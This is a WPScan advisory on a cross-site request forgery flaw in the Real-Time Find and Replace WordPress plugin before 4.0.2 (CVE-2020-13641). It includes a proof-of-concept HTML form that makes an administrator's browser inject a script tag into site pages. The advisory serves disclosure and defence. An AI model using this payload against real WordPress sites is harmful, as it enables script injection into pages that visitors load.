WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Real-Time Find and Replace < 4.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Description

This flaw could allow any user to inject malicious Javascript anywhere on a site if they could trick a site’s administrator into performing an action, like clicking on a link in a comment or email.

Proof of Concept

<html>
  <body>
    <form action="http://URL/wp-admin/tools.php?page=real-time-find-and-replace" method="POST">
      <input type="hidden" name="setup&#45;update" value="" />
      <input type="hidden" name="farfind&#91;0&#93;" value="&lt;head&gt;" />
      <input type="hidden" name="farreplace&#91;0&#93;" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

real-time-find-and-replace
Fixed in version 4.0.2

References

CVE
CVE-2020-13641
URL
https://www.wordfence.com/blog/2020/04/high-severity-vulnerability-patched-in-real-time-find-and-replace-plugin/
URL
https://plugins.trac.wordpress.org/changeset/2289725/real-time-find-and-replace

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified

No

WPVDB ID
92a30d3d-3afe-4a34-828f-ad0c7454c02a

Timeline

Publicly Published

2020-04-27 (about 2 years ago)

Added

2020-04-27 (about 2 years ago)

Last Updated

2020-05-29 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin